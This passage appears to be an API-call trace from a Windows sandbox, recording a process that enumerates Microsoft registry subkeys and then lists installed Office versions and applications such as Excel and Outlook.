[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.566] CoTaskMemFree (pv=0x2baf50)
[0086.566] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.566] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x14, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Java VM", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x15, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x16, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MediaPlayer", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x17, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft Management Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x18, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MS Design Tools", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.567] CoTaskMemFree (pv=0x2baf50)
[0086.567] CoTaskMemFree (pv=0x0)
[0086.567] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.567] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.568] CoTaskMemFree (pv=0x2baf50)
[0086.568] CoTaskMemFree (pv=0x0)
[0086.568] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.568] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.569] CoTaskMemFree (pv=0x0)
[0086.569] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.569] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.569] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.570] CoTaskMemFree (pv=0x0)
[0086.570] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.570] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.570] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x40c) returned 0x0
[0086.571] RegCloseKey (hKey=0x3e0) returned 0x0
[0086.571] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.571] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.571] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.571] CoTaskMemFree (pv=0x2baf50)
[0086.571] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
